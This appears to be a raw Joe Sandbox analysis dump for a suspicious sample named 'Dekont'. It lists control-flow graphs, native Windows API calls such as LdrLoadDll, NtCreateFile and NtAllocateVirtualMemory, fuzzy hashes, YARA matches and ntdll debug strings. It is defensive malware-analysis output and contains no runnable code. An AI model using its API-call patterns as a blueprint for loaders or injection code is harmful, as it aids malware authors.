                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1JA$rMA$rMA
                                  • API String ID: 2738559852-782607585
                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction ID: c75c44bd16ed9a046d03b4490adc68ebadf214b0f3589fd2ba36fb57c0fad8bd
                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction Fuzzy Hash: 95F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

                                  Control-flow Graph

                                  control_flow_graph 263 40acf0-40ad0c 264 40ad14-40ad19 263->264 265 40ad0f call 41cc20 263->265 266 40ad1b-40ad1e 264->266 267 40ad1f-40ad2d call 41d040 264->267 265->264 270 40ad3d-40ad4e call 41b470 267->270 271 40ad2f-40ad3a call 41d2c0 267->271 276 40ad50-40ad64 LdrLoadDll 270->276 277 40ad67-40ad6a 270->277 271->270 276->277
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                  • Instruction ID: 667dcf47c4413345b20473d406be44d3d8b7ebea9a3b2269cd40777f9644ce6e
                                  • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                  • Instruction Fuzzy Hash: 79015EB5D0020DBBDB10EBA1DC42FDEB3799F54308F0045AAA908A7281F638EB54CB95

                                  Control-flow Graph

                                  control_flow_graph 278 41a330-41a381 call 41af30 NtCreateFile
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction ID: 7ed6e6cb708c972561b0f9910f559a39af1ab3cc862b6eef20835abd22e26781
                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction Fuzzy Hash: C4F0BDB2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E851CBA4

                                  Control-flow Graph

                                  control_flow_graph 281 41a50f-41a54d call 41af30 NtAllocateVirtualMemory
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 010e29acb7f9fd415614937ca605b5bfb6e9e985f7aa4afa3a131315dc63b2b1
                                  • Instruction ID: b6d20d9d9baca4ad67b6d83bb7e3b47810d24a1c747aa2bf8ffe25eb9f604490
                                  • Opcode Fuzzy Hash: 010e29acb7f9fd415614937ca605b5bfb6e9e985f7aa4afa3a131315dc63b2b1
                                  • Instruction Fuzzy Hash: 99F01CB5211108AFCB14DF99CC81EEB77A9AF88354F15824DFE0997241C630E811CBA0

                                  Control-flow Graph

                                  control_flow_graph 284 41a510-41a526 285 41a52c-41a54d NtAllocateVirtualMemory 284->285 286 41a527 call 41af30 284->286 286->285
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction ID: 8b47746d7073478515a2f8fd1fb94e42dcc9ffa91ac9ff965dae3841ed3a313c
                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                  • Instruction Fuzzy Hash: 9CF015B2210208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                  APIs
                                  • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction ID: e9450f8bec15428cdd91297f97b7848412804bda5c7d31b3f0e5b01193c95e83
                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction Fuzzy Hash: 3CD01776211214ABD710EB99CC85EE77BACEF48764F15449ABA189B242C530FA1186E0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3e8f3ec52f11535eace4375cad759f4ca1b5eb9f7ce1a6397a2a4876fbc54e4f
                                  • Instruction ID: dd754bb06ac1b9f4610601d9edbc15c01cf4c357e3a413a22ef1c295321a5f5b
                                  • Opcode Fuzzy Hash: 3e8f3ec52f11535eace4375cad759f4ca1b5eb9f7ce1a6397a2a4876fbc54e4f
                                  • Instruction Fuzzy Hash: DA90026520241003510571588415616404A97E0201B55C023E1414590DC92589916225
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7de64d3803967406c5a0a23e5523aeea122c27aed1f8fec2c811927c01bb281d
                                  • Instruction ID: 4fe63a00a4be0024fd57aba884b3010c971f63af07bb69cd712ce4058d61e024
                                  • Opcode Fuzzy Hash: 7de64d3803967406c5a0a23e5523aeea122c27aed1f8fec2c811927c01bb281d
                                  • Instruction Fuzzy Hash: 8790023520141802E1807158840564A004597D1301F95C017E0425654DCE158B5977A1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3b8d594fd12de6e19464b2166f4cae904f5e45be844d7b23b98ac1f8b8b8a89e
                                  • Instruction ID: d0156dccc6ae95293941641556d3737e543448917a460826ce6980ff56b0d90d
                                  • Opcode Fuzzy Hash: 3b8d594fd12de6e19464b2166f4cae904f5e45be844d7b23b98ac1f8b8b8a89e
                                  • Instruction Fuzzy Hash: E390043D311410031105F55C470550700C7D7D5351355C033F1415550CDF31CD715331
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6891d6307d4f78afa2fcee63fedbd34aa51450db2dc33716b2db0892eef27ff6
                                  • Instruction ID: c3cf024e06e49e4ddee9466f68f0c7e867b81275493c19ac3b5b571fb67449da
                                  • Opcode Fuzzy Hash: 6891d6307d4f78afa2fcee63fedbd34aa51450db2dc33716b2db0892eef27ff6
                                  • Instruction Fuzzy Hash: 0E90022D21341002E1807158940960A004597D1202F95D417E0415558CCD1589695321
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: aaed31ae4da270e37c8c708284157ba1a0d7515e884c467139434d80c346f89a
                                  • Instruction ID: d8ebbb31bc3a49616ca96507c8482fb27d5b30155ca99e02d789936076ac7782
                                  • Opcode Fuzzy Hash: aaed31ae4da270e37c8c708284157ba1a0d7515e884c467139434d80c346f89a
                                  • Instruction Fuzzy Hash: C890022530141003E140715894196064045E7E1301F55D013E0814554CDD1589565322
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 05d7eaf061c073286f01e418d7f3a66a304c205f36349670b3d76eac5115d3d6
                                  • Instruction ID: 00fb22163256ffa892a9cbfe4bf3258e3ea6cd9868fab347864d447fea579c74
                                  • Opcode Fuzzy Hash: 05d7eaf061c073286f01e418d7f3a66a304c205f36349670b3d76eac5115d3d6
                                  • Instruction Fuzzy Hash: 88900225242451526545B15884055074046A7E0241795C013E1814950CC9269956D721
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c524d55bed16988747190510f92a2c6a5e4851b6c425a999b2d0fd05f47a5593
                                  • Instruction ID: 878c1edef1d81f86843d81f4c17fc7275c5fe1784a9511e119b1210cf383faf2
                                  • Opcode Fuzzy Hash: c524d55bed16988747190510f92a2c6a5e4851b6c425a999b2d0fd05f47a5593
                                  • Instruction Fuzzy Hash: 4690023520141413E11171588505707004997D0241F95C413E0824558DDA568A52A221
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3ab6f707a0c3effd480b288aacdb5b09599be8c5b1bbbad29d9f58a75ee6cd56
                                  • Instruction ID: 22facdadc443f6bc523918e2782283a3cc7b2fc9b3fa93944b1aa6f4cad0a35f
                                  • Opcode Fuzzy Hash: 3ab6f707a0c3effd480b288aacdb5b09599be8c5b1bbbad29d9f58a75ee6cd56
                                  • Instruction Fuzzy Hash: 9890023520149802E1107158C40574A004597D0301F59C413E4824658DCA9589917221
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8102e20002ef530551060bc4393558bd1ccfc29925d6986788c3d136287179f6
                                  • Instruction ID: f7152b03a16edd69a1e3ee7c39b89249f6e3e5d641a734102aa9540022df17f1
                                  • Opcode Fuzzy Hash: 8102e20002ef530551060bc4393558bd1ccfc29925d6986788c3d136287179f6
                                  • Instruction Fuzzy Hash: A490023520141402E10075989409646004597E0301F55D013E5424555ECA6589916231
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 720c6ee61882a5f21006f8210c1a299d2485d68a91a5f15d717d0bde797daf1a
                                  • Instruction ID: 1546566b5aa6f57a083bf1d229b1416257f862b39af602856981d8a8dcb742aa
                                  • Opcode Fuzzy Hash: 720c6ee61882a5f21006f8210c1a299d2485d68a91a5f15d717d0bde797daf1a
                                  • Instruction Fuzzy Hash: C390026534141442E10071588415B060045D7E1301F55C017E1464554DCA19CD526226
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d026c17d6c587e38ad3d6f1e8ad7f96675e193ce1ab79ff1a542b76f67ca6bf4
                                  • Instruction ID: 1ae9b2c476b5baa758cb28ea6ef0b2e4d791ac57ac29be1b0899c33d32da219e
                                  • Opcode Fuzzy Hash: d026c17d6c587e38ad3d6f1e8ad7f96675e193ce1ab79ff1a542b76f67ca6bf4
                                  • Instruction Fuzzy Hash: 6090023520181402E1007158881570B004597D0302F55C013E1564555DCA2589516671
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 763da88d428b97dbbc804880d5e5395f02dae8e51aba0bcbc915a358e467e138
                                  • Instruction ID: 9c71a9c58fad713519c862a5b8b221eacab6302ff142424941f9429585b61919
                                  • Opcode Fuzzy Hash: 763da88d428b97dbbc804880d5e5395f02dae8e51aba0bcbc915a358e467e138
                                  • Instruction Fuzzy Hash: 739002256014104251407168C8459064045BBE1211755C123E0D98550DC95989655765
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 704b2051ef1cc55bf324cc7858b8478bc54a70737a813636f2385279b8cc461e
                                  • Instruction ID: 1dbcc1f4c02f86b81ac21260f78da48b6a648aee0c86b93e42d6aaaae5733f1e
                                  • Opcode Fuzzy Hash: 704b2051ef1cc55bf324cc7858b8478bc54a70737a813636f2385279b8cc461e
                                  • Instruction Fuzzy Hash: 8C900225211C1042E20075688C15B07004597D0303F55C117E0554554CCD1589615621
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4f37ec8c70b66c99716d3fe1dfea648b3efe50e5289f0d466f0a9759d353542c
                                  • Instruction ID: d9c29f200c4e00805b7e07dbfc98bd5fab988fff48a1ec2866f6a8a72002a2d6
                                  • Opcode Fuzzy Hash: 4f37ec8c70b66c99716d3fe1dfea648b3efe50e5289f0d466f0a9759d353542c
                                  • Instruction Fuzzy Hash: C290022560141502E10171588405616004A97D0241F95C023E1424555ECE258A92A231
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: fe561a7df4c6609879f15383cc7774aa20e7f7a10171b1db23581a72e311db38
                                  • Instruction ID: 71a6ccf7f8235422c68420fea74a26f72053c2d7f57205dc6fa895cca77994d4
                                  • Opcode Fuzzy Hash: fe561a7df4c6609879f15383cc7774aa20e7f7a10171b1db23581a72e311db38
                                  • Instruction Fuzzy Hash: C190027520141402E14071588405746004597D0301F55C013E5464554ECA598ED56765
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:

                                  APIs
                                  • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateExitHeapProcess
                                  • String ID: 6EA
                                  • API String ID: 1054155344-1400015478

                                  APIs
                                  • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: 6EA
                                  • API String ID: 1279760036-1400015478

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0

                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0

                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  APIs
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Strings
                                  • The resource is owned shared by %d threads, xrefs: 01088E2E
                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01088E86
                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01088F26
                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01088F2D
                                  • The resource is owned exclusively by thread %p, xrefs: 01088E24
                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01088DB5
                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01088DA3
                                  • write to, xrefs: 01088F56
                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01088E3F
                                  • Go determine why that thread has not released the critical section., xrefs: 01088E75
                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01088F34
                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01088D8C
                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01088DD3
                                  • *** enter .exr %p for the exception record, xrefs: 01088FA1
                                  • *** Inpage error in %ws:%s, xrefs: 01088EC8
                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01088E4B
                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 01088E02
                                  • <unknown>, xrefs: 01088D2E, 01088D81, 01088E00, 01088E49, 01088EC7, 01088F3E
                                  • an invalid address, %p, xrefs: 01088F7F
                                  • *** enter .cxr %p for the context, xrefs: 01088FBD
                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01088FEF
                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01088DC4
                                  • The instruction at %p referenced memory at %p., xrefs: 01088EE2
                                  • The critical section is owned by thread %p., xrefs: 01088E69
                                  • This failed because of error %Ix., xrefs: 01088EF6
                                  • *** An Access Violation occurred in %ws:%s, xrefs: 01088F3F
                                  • a NULL pointer, xrefs: 01088F90
                                  • *** then kb to get the faulting stack, xrefs: 01088FCC
                                  • The instruction at %p tried to %s , xrefs: 01088F66
                                  • read from, xrefs: 01088F5D, 01088F62
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                  • API String ID: 0-108210295
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2160512332
                                  Strings
                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010454E2
                                  • Critical section address., xrefs: 01045502
                                  • Address of the debug info found in the active list., xrefs: 010454AE, 010454FA
                                  • Critical section address, xrefs: 01045425, 010454BC, 01045534
                                  • 8, xrefs: 010452E3
                                  • undeleted critical section in freed memory, xrefs: 0104542B
                                  • corrupted critical section, xrefs: 010454C2
                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010454CE
                                  • Thread identifier, xrefs: 0104553A
                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0104540A, 01045496, 01045519
                                  • Critical section debug info address, xrefs: 0104541F, 0104552E
                                  • double initialized or corrupted critical section, xrefs: 01045508
                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01045543
                                  • Invalid debug info address of this critical section, xrefs: 010454B6
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
